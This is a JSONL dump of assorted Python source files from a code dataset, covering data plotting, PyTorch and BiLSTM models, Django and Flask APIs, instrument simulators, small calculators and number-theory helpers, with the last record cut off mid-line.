+{"seq_id":"207556272","text":"# Import pyplot\nimport matplotlib.pyplot as plt\n# Import pandas\nimport pandas as pd\n\n# Import dataset\ndf = pd.read_csv('../datasets/weather_data_austin_2010.csv', nrows=1000);\n\n# Change columns names\ndf.rename(columns={'Temperature': 'Temperature (deg F)', 'DewPoint': 'Dew Point (deg F)'}, inplace=True)\n\n# Plot all columns (default)\ndf.plot()\nplt.show()\n\n# Plot all columns as subplots\ndf.plot(subplots=True)\nplt.show()\n\n# Plot just the Dew Point data\ncolumn_list1 = ['Dew Point (deg F)']\ndf[column_list1].plot()\nplt.show()\n\n# Plot the Dew Point and Temperature data, but not the Pressure data\ncolumn_list2 = ['Temperature (deg F)','Dew Point (deg F)']\ndf[column_list2].plot()\nplt.show()","sub_path":"plotting-dataframes-pandas/plotting-dataframes-pandas.py","file_name":"plotting-dataframes-pandas.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"604838389","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport colour\n\nfrom sklearn.metrics import r2_score\n\n\ndef compare_param_dist(param_raw, param_pred):\n len_param = len(param_raw)\n category = (['height'] * len_param + ['gap'] * len_param + ['period'] * len_param + ['diameter'] * len_param) * 2\n param_raw = param_raw.T.reshape(-1)\n param_pred = param_pred.T.reshape(-1)\n type = ['raw'] * len(param_pred) + ['pred'] * len(param_pred)\n res_df = pd.DataFrame({'val':np.concatenate((param_raw, param_pred)), 'cat':category, 'type':type})\n sns.boxplot(x='cat', y='val', data=res_df, hue='type')\n\ndef compare_cie_dist(cie_raw, cie_pred):\n len_cie = len(cie_raw)\n category = (['x'] * len_cie + ['y'] * len_cie + ['Y'] * len_cie) * 2\n cie_raw = cie_raw.T.reshape(-1)\n cie_pred = cie_pred.T.reshape(-1)\n type = ['raw'] * len(cie_pred) + ['pred'] * len(cie_pred)\n res_df = pd.DataFrame({'val':np.concatenate((cie_raw, cie_pred)), 'cat':category, 'type':type})\n sns.boxplot(x='cat', y='val', data=res_df, hue='type')\n\ndef plot_cie(cie_raw, cie_pred):\n from colour.plotting import plot_chromaticity_diagram_CIE1931\n from matplotlib.patches import Polygon\n\n fig, ax = plot_chromaticity_diagram_CIE1931()\n srgb = Polygon(list(zip([0.64, 0.3, 0.15], [0.33, 0.6, 0.06])), facecolor='0.9', alpha=0.1, edgecolor='k')\n ax.add_patch(srgb)\n ax.scatter(cie_raw[:,0], cie_raw[:,1], s=1, c='b')\n ax.scatter(cie_pred[:,0], cie_pred[:,1], s=1, c='k')\n return fig\n\ndef plot_cie_raw_pred(cie_raw, cie_pred):\n fig, ax = plt.subplots(1, 3, figsize=(10, 3))\n titles = ['x', 'y', 'Y']\n for i in range(3):\n raw_pred = np.array(sorted(zip(cie_raw[:, i], cie_pred[:, i])))\n ax[i].scatter(raw_pred[:, 0], raw_pred[:, 1])\n ax[i].plot([raw_pred[:,0].min(), raw_pred[:,0].max()], [raw_pred[:,1].min(), raw_pred[:,1].max()], c='k')\n ax[i].set_title(titles[i] + ' (r2 score = {:.3f})'.format(r2_score(raw_pred[:, 0], raw_pred[:, 1])))\n ax[i].set_xlabel('ground truth')\n ax[i].set_ylabel('predicted')","sub_path":"Model/plotting_utils.py","file_name":"plotting_utils.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"636787421","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), os.path.pardir))\n\nfrom data_process.util import savebest_checkpoint, load_checkpoint,plot_all_epoch,plot_xfit, os_makedirs\n\nimport numpy as np\n\nfrom sklearn.metrics import mean_squared_error\n\nfrom tqdm import trange\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import PackedSequence\nimport torch.optim as optim\n\n\n\nclass MLP(nn.Module):\n def __init__(self, params=None, logger=None):\n super().__init__()\n self.params = params\n self.logger = logger\n\n timesteps, output_dim, hidden_size = params.steps, params.H, params.hidden_size\n\n self.Input_dim = timesteps\n self.Output_dim = output_dim\n self.Hidden_Size = hidden_size\n\n self.num_epochs = self.params.num_epochs\n\n self.hidden = nn.Linear(self.Input_dim,self.Hidden_Size)\n self.fc = nn.Linear(self.Hidden_Size,self.Output_dim)\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=params.learning_rate)\n self.epoch_scheduler = torch.optim.lr_scheduler.StepLR(\n self.optimizer, params.step_lr, gamma=0.9)\n self.loss_fn = nn.MSELoss()\n\n self.params.plot_dir = os.path.join(params.model_dir, 'figures')\n # create missing directories\n os_makedirs(self.params.plot_dir)\n\n if self.params.device == torch.device('cpu'):\n self.logger.info('Not using cuda...')\n else:\n self.logger.info('Using Cuda...')\n self.to(self.params.device)\n\n\n def forward(self, input):\n input = input[:,:,0]\n h=self.hidden(input)\n h=torch.sigmoid(h)\n pred =self.fc(h)\n return pred\n\n self.Input_dim = input_dim\n self.Output_dim = output_dim\n self.Hidden_Size = hidden_size\n\n self.Num_iters = num_iters\n self.Optim_method = optim_method\n self.Learn_rate = learning_rate\n self.plot_ = plot_\n self.device = device\n\n self.verbose = True\n\n\n def xfit(self, train_loader, val_loader, restore_file=None):\n # update self.params\n if restore_file is not None and os.path.exists(restore_file) and self.params.restore:\n self.logger.info(\n 'Restoring parameters from {}'.format(restore_file))\n load_checkpoint(restore_file, self, self.optimizer)\n\n min_vmse = 9999\n train_len = len(train_loader)\n loss_summary = np.zeros((train_len * self.num_epochs))\n loss_avg = np.zeros((self.num_epochs))\n vloss_avg = np.zeros_like(loss_avg)\n\n epoch = 0\n for epoch in trange(self.num_epochs):\n # self.logger.info(\n # 'Epoch {}/{}'.format(epoch + 1, self.num_epochs))\n mse_train = 0\n loss_epoch = np.zeros(train_len)\n for i, (batch_x, batch_y) in enumerate(train_loader):\n batch_x = batch_x.to(torch.float32).to(self.params.device)\n batch_y = batch_y.to(torch.float32).to(self.params.device)\n self.optimizer.zero_grad()\n y_pred = self(batch_x)\n # y_pred = y_pred.squeeze(1)\n loss = self.loss_fn(y_pred, batch_y)\n loss.backward()\n mse_train += loss.item()\n loss_epoch[i] = loss.item()\n self.optimizer.step()\n \n mse_train = mse_train / train_len\n loss_summary[epoch * train_len:(epoch + 1) * train_len] = loss_epoch\n loss_avg[epoch] = mse_train\n\n self.epoch_scheduler.step()\n \n with torch.no_grad():\n mse_val = 0\n preds = []\n true = []\n for batch_x, batch_y in val_loader:\n batch_x = batch_x.to(torch.float32).to(self.params.device)\n batch_y = batch_y.to(torch.float32).to(self.params.device)\n output = self(batch_x)\n # output = output.squeeze(1)\n preds.append(output.detach().cpu().numpy())\n true.append(batch_y.detach().cpu().numpy())\n mse_val += self.loss_fn(output,\n batch_y).item()\n mse_val = mse_val / len(val_loader)\n vloss_avg[epoch] = mse_val\n\n preds = np.concatenate(preds)\n true = np.concatenate(true)\n\n # self.logger.info('Current training loss: {:.4f} \\t validating loss: {:.4f}'.format(mse_train,mse_val))\n \n vmse = mean_squared_error(true, preds)\n # self.logger.info('Current vmse: {:.4f}'.format(vmse))\n if vmse < min_vmse:\n min_vmse = vmse\n # self.logger.info('Found new best state')\n savebest_checkpoint({\n 'epoch': epoch,\n 'cv': self.params.cv,\n 'state_dict': self.state_dict(),\n 'optim_dict': self.optimizer.state_dict()}, checkpoint=self.params.model_dir)\n # self.logger.info(\n # 'Checkpoint saved to {}'.format(self.params.model_dir)) \n # self.logger.info('Best vmse: {:.4f}'.format(min_vmse))\n\n plot_all_epoch(loss_summary[:(\n epoch + 1) * train_len], self.params.dataset + '_loss_cv{}'.format(self.params.cv), self.params.plot_dir)\n plot_xfit(loss_avg,vloss_avg,self.params.dataset + '_loss_cv{}'.format(self.params.cv), self.params.plot_dir)\n\n def predict(self, x, using_best=True):\n '''\n x: (numpy.narray) shape: [sample, full-len, dim]\n return: (numpy.narray) shape: [sample, prediction-len]\n '''\n # test_batch: shape: [full-len, sample, dim]\n best_pth = os.path.join(self.params.model_dir, 'best.cv{}.pth.tar'.format(self.params.cv))\n if os.path.exists(best_pth) and using_best:\n # self.logger.info('Restoring best parameters from {}'.format(best_pth))\n load_checkpoint(best_pth, self, self.optimizer)\n\n x = torch.tensor(x).to(torch.float32).to(self.params.device)\n output = self(x)\n # output = output.squeeze(1)\n pred = output.detach().cpu().numpy()\n\n return pred","sub_path":"models/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"455821610","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\n\ndef read(fname):\n with open(fname, 'r') as fr:\n return fr.read()\n \nsetup(\n description='Robot word search game',\n packages=['wskit','wskit.bots'],\n long_description=read('README.rst'),\n entry_points={'console_scripts':['wordseek = wskit.wordseek:run']},\n name='wordseek',\n license='MIT',\n author='David Hacker',\n author_email='dmhacker@yahoo.com',\n url='https://github.com/dmhacker/wordseek',\n package_data={'wskit':['*.py']},\n version='1.0.8',\n install_requires=[\n 'colorama',\n ],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"541216478","text":"# https://www.hackerrank.com/challenges/cipher/problem\n\nn, k = map(int, input().split())\ns = input()\nl = len(s)\ndecoded = [0 for i in range(l)]\n# The first digit is not XOR with anything\ndecoded[0] = int(s[0])\n# Complexity: O(len(s))\nfor i in range(1, l):\n # To guess the digit at i, \n # We know that decoded[i - 2] ^ decoded[i - 1] ^ decoded[i] = s[i]\n # when decoded[i - 2] ^ decoded[i - 1] = s[i - 1]\n # Therefore to generalize, s[i - 1] ^ decoded[i] = s[i]\n # This is equivalent to decoded[i] = s[i - 1] ^ s[i]\n\n decoded[i] = int(s[i - 1]) ^ int(s[i])\n # When i >= k, there is no longer shifting, and if we \n # follow the same formula, there would be a redundant XOR with decoded[i - k]\n # therefore, we do another XOR with decoded[i - k] to balance this out (0)\n if i >= k:\n decoded[i] = decoded[i] ^ decoded[i - k]\n\nres = \"\".join([str(x) for x in decoded[: l - k + 1]])\nprint(res)\n\n\n\n","sub_path":"hackerrank/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"8833329","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom highway import HighwayMLP\nfrom attention import Attention\nfrom attention import BiAFAttention\nfrom tree_lstm import ChildSumTreeLSTM\nfrom utils import create_trees\nfrom syntactic_gcn import SyntacticGCN\nfrom sa_lstm import SyntaxAwareLSTM\nfrom rcnn import RCNN\nfrom bert import BertEmbedder\n\nfrom utils import USE_CUDA\nfrom utils import get_torch_variable_from_np, get_data\n\n\nclass End2EndModel(nn.Module):\n def __init__(self, model_params):\n super(End2EndModel,self).__init__()\n\n self.model_name = model_params['model_name']\n self.dropout = model_params['dropout']\n self.batch_size = model_params['batch_size']\n\n if self.model_name == 'bert-base-multilingual-cased':\n self.word_encoder = BertEmbedder(self.model_name)\n elif self.model_name == 'xlm-mlm-tlm-xnli15-1024':\n self.word_encoder = BertEmbedder(self.model_name)\n else:\n None\n\n # self.word_vocab_size = model_params['word_vocab_size']\n # self.lemma_vocab_size = model_params['lemma_vocab_size']\n # self.pos_vocab_size = model_params['pos_vocab_size']\n self.deprel_vocab_size = model_params['deprel_vocab_size']\n # self.pretrain_vocab_size = model_params['pretrain_vocab_size']\n\n # self.word_emb_size = model_params['word_emb_size']\n # self.lemma_emb_size = model_params['lemma_emb_size']\n # self.pos_emb_size = model_params['pos_emb_size']\n \n self.use_deprel = model_params['use_deprel']\n self.deprel_emb_size = model_params['deprel_emb_size']\n \n # self.pretrain_emb_size = model_params['pretrain_emb_size']\n # self.pretrain_emb_weight = model_params['pretrain_emb_weight']\n\n self.bilstm_num_layers = model_params['bilstm_num_layers']\n self.bilstm_hidden_size = model_params['bilstm_hidden_size']\n\n self.target_vocab_size = model_params['target_vocab_size']\n \n self.use_flag_embedding = model_params['use_flag_embedding']\n self.flag_emb_size = model_params['flag_embedding_size']\n\n self.deprel2idx = model_params['deprel2idx']\n\n if self.use_flag_embedding:\n self.flag_embedding = nn.Embedding(2, self.flag_emb_size)\n self.flag_embedding.weight.data.uniform_(-1.0,1.0)\n\n # self.word_embedding = nn.Embedding(self.word_vocab_size, self.word_emb_size)\n # self.word_embedding.weight.data.uniform_(-1.0,1.0)\n #\n # self.lemma_embedding = nn.Embedding(self.lemma_vocab_size, self.lemma_emb_size)\n # self.lemma_embedding.weight.data.uniform_(-1.0,1.0)\n #\n # self.pos_embedding = nn.Embedding(self.pos_vocab_size, self.pos_emb_size)\n # self.pos_embedding.weight.data.uniform_(-1.0,1.0)\n\n if self.use_deprel:\n self.deprel_embedding = nn.Embedding(self.deprel_vocab_size, self.deprel_emb_size)\n self.deprel_embedding.weight.data.uniform_(-1.0,1.0)\n\n # self.pretrained_embedding = nn.Embedding(self.pretrain_vocab_size,self.pretrain_emb_size)\n # self.pretrained_embedding.weight.data.copy_(torch.from_numpy(self.pretrain_emb_weight))\n\n if self.model_name == 'bert-base-multilingual-cased':\n input_emb_size = 768\n elif self.model_name == 'xlm-mlm-tlm-xnli15-1024':\n input_emb_size = 1024\n else:\n input_emb_size = 512\n\n if self.use_flag_embedding:\n input_emb_size += self.flag_emb_size\n else:\n input_emb_size += 1\n\n if self.use_deprel:\n input_emb_size += self.deprel_emb_size #\n # else:\n # input_emb_size += self.pretrain_emb_size + self.word_emb_size + self.lemma_emb_size + self.pos_emb_size\n\n\n # if USE_CUDA:\n # self.bilstm_hidden_state0 = (Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True).cuda(),\n # Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True).cuda())\n # else:\n # self.bilstm_hidden_state0 = (Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True),\n # Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True))\n\n\n self.bilstm_layer = nn.LSTM(input_size=input_emb_size,\n hidden_size = self.bilstm_hidden_size, num_layers = self.bilstm_num_layers,\n dropout = self.dropout, bidirectional = True,\n bias = True, batch_first=True)\n\n self.use_highway = model_params['use_highway']\n self.highway_layers = model_params['highway_layers']\n if self.use_highway:\n self.highway_layers = nn.ModuleList([HighwayMLP(self.bilstm_hidden_size*2, activation_function=F.relu)\n for _ in range(self.highway_layers)])\n\n self.output_layer = nn.Linear(self.bilstm_hidden_size*2, self.target_vocab_size)\n else:\n self.output_layer = nn.Linear(self.bilstm_hidden_size*2,self.target_vocab_size)\n\n\n def softmax(self,input, axis=1):\n \"\"\"\n Softmax applied to axis=n\n \n Args:\n input: {Tensor,Variable} input on which softmax is to be applied\n axis : {int} axis on which softmax is to be applied\n \n Returns:\n softmaxed tensors\n \n \"\"\"\n \n input_size = input.size()\n trans_input = input.transpose(axis, len(input_size)-1)\n trans_size = trans_input.size()\n input_2d = trans_input.contiguous().view(-1, trans_size[-1])\n soft_max_2d = F.softmax(input_2d)\n soft_max_nd = soft_max_2d.view(*trans_size)\n return soft_max_nd.transpose(axis, len(input_size)-1)\n \n\n def forward(self, batch_input):\n \n flag_batch = get_torch_variable_from_np(batch_input['flag'])\n word_batch = get_torch_variable_from_np(batch_input['word']).long()\n word_lens_batch = get_torch_variable_from_np(batch_input['word_lens'])\n # lemma_batch = get_torch_variable_from_np(batch_input['lemma'])\n # pos_batch = get_torch_variable_from_np(batch_input['pos'])\n deprel_batch = get_torch_variable_from_np(batch_input['deprel'])\n # pretrain_batch = get_torch_variable_from_np(batch_input['pretrain'])\n # predicate_batch = get_torch_variable_from_np(batch_input['predicate'])\n # predicate_pretrain_batch = get_torch_variable_from_np(batch_input['predicate_pretrain'])\n origin_batch = batch_input['origin']\n origin_deprel_batch = batch_input['deprel']\n\n if self.use_flag_embedding:\n flag_emb = self.flag_embedding(flag_batch)\n else:\n flag_emb = flag_batch.view(flag_batch.shape[0],flag_batch.shape[1], 1).float()\n \n word_emb = self.word_encoder(word_batch, word_lens_batch)\n # lemma_emb = self.lemma_embedding(lemma_batch)\n # pos_emb = self.pos_embedding(pos_batch)\n # pretrain_emb = self.pretrained_embedding(pretrain_batch)\n\n if self.use_deprel:\n deprel_emb = self.deprel_embedding(deprel_batch)\n\n # predicate_emb = self.word_embedding(predicate_batch)\n # predicate_pretrain_emb = self.pretrained_embedding(predicate_pretrain_batch)\n\n if self.use_deprel:\n input_emb = torch.cat([flag_emb, word_emb, deprel_emb], 2) #\n else:\n input_emb = torch.cat([flag_emb, word_emb], 2) #\n\n\n\n ##############################################\n # PLACE EMBEDDERS HERE\n ##############################################\n\n bilstm_output, (_, bilstm_final_state) = self.bilstm_layer(input_emb) #,self.bilstm_hidden_state0)\n\n\n\n bilstm_output = bilstm_output.contiguous()\n\n #print(hidden_input.shape)\n\n hidden_input = bilstm_output.view(bilstm_output.shape[0]*bilstm_output.shape[1],-1)\n\n if self.use_highway:\n for current_layer in self.highway_layers:\n hidden_input = current_layer(hidden_input)\n\n output = self.output_layer(hidden_input)\n else:\n output = self.output_layer(hidden_input)\n return output\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"324376580","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom rest_framework import viewsets, mixins\nfrom .serializers import *\nfrom .filters import ServerFilter\n\n\nclass ServerAutoReportViewset(mixins.CreateModelMixin,\n viewsets.GenericViewSet,\n ):\n \"\"\"\n create:\n 创建服务器记录\n \"\"\"\n queryset = Server.objects.all()\n serializer_class = ServerAutoReportSerializer\n\nclass ServerViewset(viewsets.ReadOnlyModelViewSet,\n ):\n \"\"\"\n retrieve:\n 返回指定服务器信息\n list:\n 返回服务器列表\n \"\"\"\n queryset = Server.objects.all()\n serializer_class = ServerSerializer\n # filter_backends = (DjangoFilterBackend,)\n filter_class = ServerFilter\n\n\nclass NetworkDeviceViewset(viewsets.ReadOnlyModelViewSet,\n ):\n \"\"\"\n retrieve:\n 返回指定网卡信息\n list:\n 返回网卡列表\n \"\"\"\n queryset = NetworkDevice.objects.all()\n serializer_class = NetWorkDeivceSerializer\n\n\nclass IPViewset(viewsets.ReadOnlyModelViewSet,\n ):\n \"\"\"\n retrieve:\n 返回指定IP信息\n list:\n 返回IP列表\n \"\"\"\n queryset = IP.objects.all()\n serializer_class = IPSerializer\n","sub_path":"apps/servers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"66040083","text":"###############################################################################\n# Author: Daniil Budanov\n# Contact: danbudanov@gmail.com\n# Summer Internship - 2016\n###############################################################################\n# Title: main.py\n# Project: Romeo Robot\n# Description:\n# - Instantiates server\n# - creates routes for API\n# - runs server\n# Last Modified: 7.13.2016\n###############################################################################\nfrom robot import *\n\n# instantiate Flask server\napp = Flask(__name__)\napi = Api(app)\n\n# create routes for Flask API\napi.add_resource(Start, '/actions/start')\napi.add_resource(Stop, '/actions/stop')\napi.add_resource(LongTurn, '/actions/longturn')\napi.add_resource(PointTurn, '/actions/pointturn')\napi.add_resource(Wheels, '/actions/wheels/')\napi.add_resource(Forward, '/actions/forward', '/actions/forwards')\napi.add_resource(Path, '/paths/administer/', '/paths/administer')\napi.add_resource(ExecutePath, '/paths/execute/')\n\n# Run flask server\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000) # host makes server accessible on network\n","sub_path":"romeo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"239069259","text":"import time\nexit = 0\ndef bc():\n total= {\n 'cost_V':24.54,\n 'sell_V':29.55,\n 'ss':243\n }\n print('[Current]\\n\\ncost:', total['cost_V'], '\\b$')\n print('sell price:', total['sell_V'], '\\b$')\n print('Stock:', total['ss'])\n print(' \\n\\n')\n time.sleep(1)\n while True:\n while True:\n try:\n stock = int(input('Enter stock to be sold:'))\n total['ss'] = stock\n del stock\n time.sleep(0.4)\n break\n except ValueError:\n time.sleep(0.25)\n print('\\n[Error]:\\nenter a full number\\n')\n time.sleep(0.5)\n continue\n while True:\n try:\n change = str(input('\\nChange cost or sell value?(y/n):'))\n time.sleep(0.3)\n if change == 'y':\n while True:\n try:\n c = float(input('\\nNew cost per stock:'))\n time.sleep(0.2)\n except ValueError:\n print('Enter a valid price (a real number)\\n')\n time.sleep(0.2)\n continue\n break\n while True:\n try:\n d = float(input('New sell price per stock:'))\n time.sleep(0.2)\n except ValueError:\n print('Enter a valid price (a real number)\\n')\n time.sleep(0.2)\n continue\n total['cost_V'] = c\n total['sell_V'] = d\n del change, c, d\n break\n break\n elif change == 'n':\n time.sleep(1)\n del change\n break\n else:\n print('I only understand yes or no (\"y\" or \"n\")')\n continue\n except ValueError:\n print('Please use \"y\" for yes or \"n\" for no')\n time.sleep(0.3)\n continue\n print()\n print('calculating',end='\\r')\n b = (total['sell_V']*total['ss'])-(total['cost_V']*total['ss'])\n time.sleep(0.2)\n print('calculating.',end='\\r')\n c = round(b)\n time.sleep(0.2)\n print('calculating..',end='\\r')\n c = int(c)\n time.sleep(0.2)\n print('calculating...\\n')\n time.sleep(0.5)\n print('[Profit]\\n\\nGains: ', c,'\\b$\\nAccurate Gains:', b,'\\b$\\n\\n\\n\\n\\n')\n inpt = str(input('Again?(y/n)'))\n if inpt == 'y':\n time.sleep(0.05)\n continue\n elif inpt == 'n':\n break\n else:\n print('Use \"y\" for yes and \"n\" for no')\n time.sleep(0.2)\ndef p():\n while True:\n while True:\n try:\n print()\n inpt = float(input('Input Money:'))\n break\n except ValueError:\n print('Invalid Input')\n time.sleep(0.1)\n continue\n print()\n print('[Converted]\\n$%.2f' %(inpt))\n inpt = str(input('Again?(y/n)'))\n if inpt == 'y':\n time.sleep(0.05)\n continue\n elif inpt == 'n':\n break\n else:\n print('Use \"y\" for yes and \"n\" for no')\n time.sleep(0.2)\nwhile True:\n if exit > 0:\n exit = 0\n break\n change = str(input('[Main Menu]\\nBusinesss_Calculation[bc] or Payrolls[p]?:'))\n time.sleep(0.3)\n if change == 'bc':\n time.sleep(0.2)\n print('\\nOpening Business Calculation [Task 1]\\n\\n')\n time.sleep(0.7)\n bc()#Opens business calculation\n while True:\n change = str(input('Exit[e] or Main Menu[mm]?'))\n print()\n if change == 'e':\n print('[Exitting]')\n time.sleep(1)\n exit = 1\n break\n elif change == 'mm':\n time.sleep(0.3)\n break\n else:\n print('Use \"e\" for Exit or \"mm\" for Main Menu')\n print()\n time.sleep(0.2)\n continue\n elif change == 'p':\n time.sleep(0.2)\n print('\\nOpening Payrolls [Task 2]\\n\\n')\n time.sleep(0.7)\n p()#Opens payrolls\n while True:\n change = str(input('Exit[e] or Main Menu[mm]?'))\n print()\n if change == 'e':\n print('[Exitting]')\n time.sleep(1)\n exit = 1\n break\n elif change == 'mm':\n time.sleep(0.3)\n break\n else:\n print('Use \"e\" for Exit or \"mm\" for Main Menu')\n print()\n time.sleep(0.2)\n continue\n else:\n print('Can only receive Business_Calculation and Payrolls (\"bc\" or \"p\")\\n')\n time.sleep(0.6)\n continue","sub_path":"Assignment_7 Efsane Çözüm.py","file_name":"Assignment_7 Efsane Çözüm.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"460085032","text":"# -*- coding: utf-8 -*-\nfrom threading import Thread, activeCount\nfrom time import sleep\nimport logging\nimport queue\n\nimport sim_fungen\nimport sim_voltmeter\nimport sim_instrument\n\n\nclass StudiedObject(object):\n def __init__(self, read_from_actuator):\n self.read = read_from_actuator\n self.memory = queue.Queue()\n self._present_value = 0\n\n def action(self):\n in_value = self.read()\n self.memory.put(in_value)\n if self.memory.empty() or self.memory.qsize()<10:\n self._present_value = 0\n else:\n self._present_value = 0.5*self.memory.get()\n\n def present_value(self):\n return self._present_value\n\n\nclass Namespace():\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\ndef create_actuator_server(actuator):\n logging.info('Creating fungen server')\n args = Namespace('localhost', 5678)\n actuator_server = sim_instrument.main_tcp(actuator, args)\n logging.info('Fungen: interrupt the program with Ctrl-C')\n try:\n actuator_server.serve_forever()\n except KeyboardInterrupt:\n logging.info('Fungen: Ending')\n finally:\n actuator_server.shutdown()\n\ndef create_sensor_server(sensor):\n logging.info('Creating voltmeter server')\n args = Namespace('localhost', 5679)\n sensor_server = sim_instrument.main_tcp(sensor, args)\n logging.info('Voltmeter: interrupt the program with Ctrl-C')\n try:\n sensor_server.serve_forever()\n except KeyboardInterrupt:\n logging.info('Voltmeter: Ending')\n finally:\n sensor_server.shutdown()\n\ndef serve_forever():\n try:\n while activeCount() == 3:\n obj.action()\n sleep(0.1)\n except KeyboardInterrupt:\n logging.info('Experiment: Ending.')\n\nif __name__ == \"__main__\":\n fungen = sim_fungen.SimFunctionGenerator()\n obj = StudiedObject(fungen.generator_output)\n voltmeter = sim_voltmeter.SimVoltmeter(obj.present_value, fungen.generator_output)\n fthread = Thread(target=create_actuator_server, args=(fungen, ))\n vthread = Thread(target=create_sensor_server, args=(voltmeter, ))\n fthread.daemon = True\n vthread.daemon = True\n fthread.start()\n vthread.start()\n\n sleep(1)\n serve_forever()\n","sub_path":"examples/example_simulators/sim_experiment.py","file_name":"sim_experiment.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"528384636","text":"#encoding:utf-8\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext.webapp.util import run_wsgi_app\r\nfrom google.appengine.ext.webapp import template\r\nfrom basetypes import *\r\nimport os,datetime,logging\r\n \r\nclass Frame(webapp.RequestHandler):\r\n def get(self):\r\n tablist = [\r\n {\r\n 'destination' : '/main?ajax',\r\n 'icon' : 'main',\r\n 'tooltip' : ' 主界面 '\r\n },\r\n {\r\n 'destination' : '/stat?ajax',\r\n 'icon' : 'stat',\r\n 'tooltip' : '统计信息'\r\n },\r\n {\r\n 'destination' : '/show?ajax',\r\n 'icon' : 'show',\r\n 'tooltip' : '查看数据'\r\n },\r\n {\r\n 'destination' : '/add?ajax',\r\n 'icon' : 'add',\r\n 'tooltip' : '添加数据'\r\n },\r\n ]\r\n #----generate parameter list----------------------------------------------------------------------\r\n template_values = {\r\n 'tablist' : tablist\r\n }\r\n path = os.path.join(os.path.dirname(__file__), './/template//frame.html')\r\n #----end------------------------------------------------------------------------------------------\r\n self.response.out.write(template.render(path,template_values))\r\n\r\n\r\ndef main():\r\n application = webapp.WSGIApplication([(r'/.*', Frame)],debug=True)\r\n run_wsgi_app(application)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"InfoRecorderOnline/Index.py","file_name":"Index.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"590886717","text":"import json\n\nf = open(\"org.json\").read()\nf=f.replace(\"\\n\",\"\")\ndata = json.loads(f)\nparent={}\nlevel={}\nn=len(data)\nfor i in range(1,n):\n\tfor j in data['L'+str(i)]:\n\t\tlevel[j['name']]=i\n\t\tparent[j['name']]=j['parent']\nparent[data['L0'][0]['name']]='-1'\nlevel[data['L0'][0]['name']]=0\n#print(parent)\n#print(level)\n\nroot=data['L0'][0]['name']\na=input()\nb=input()\naa=a\nbb=b\n\nif(root==a or root==b):\n\tprint(\"NO LEADER\")\n\texit()\naa=[]\nbb=[]\naa.insert(0,a)\naa.insert(0,b)\nwhile(parent[a]!=\"-1\"):\n\taa.insert(0,parent[a])\n\t#aa=parent[a]+aa\n\ta=parent[a]\n\nwhile(parent[b]!=\"-1\"):\n\tbb.insert(0,parent[b])\n\t#aa=parent[a]+aa\n\tb=parent[b]\n\nlca=aa[0]\n#print(aa)\n#print(bb)\ni=0\nj=0\nn=len(aa)\nm=len(bb)\nwhile(i>> gcd(1989, 867)\n 51\n \n \"\"\"\n\n # Make sure b is the smaller.\n if a < b:\n a,b = b,a\n\n if b <= 0:\n raise Exception(\"Written for postive numbers\")\n\n # perform the euclid's algorithm\n # http://en.wikipedia.org/wiki/Euclidean_algorithm\n while b != 0:\n a, b = b, a % b\n\n return a\n\n\ndef lcm(a, b):\n \"\"\"Least common multiplier\n\n >>> lcm(1769, 551)\n 33611\n \n \"\"\"\n\n d = gcd(a, b)\n return (a / d) * b\n\n\n\ndef sieve(N):\n \"\"\"Find the primes less than N\n\n Use the sieve of eratosthenes to find prime numbers.\n Could be a lot better, but for reasonable N's, it works\n ok.\n\n >>> sieve(10)\n [2, 3, 5, 7]\n \"\"\"\n\n # Create a list of potential primes. We can drop all the\n # even numbers, because we know that they aren't going to\n # to prime (except 2). We have to account for that later,\n # but it saves half the memory, and half the checking.\n ar = range(1,N,2)\n\n M = len(ar)\n\n # Check each entry in the array in order. If the entry\n # is not marked off, it is prime. When we find a prime,\n # remove its multiples from the rest of the list.\n for d in xrange(1,int(1+(sqrt(N) + 